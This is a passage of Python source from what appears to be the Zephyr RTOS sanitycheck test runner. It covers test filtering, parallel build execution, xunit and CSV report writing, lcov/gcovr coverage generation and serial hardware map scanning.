if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.error(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' \
or (not instance.run and instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
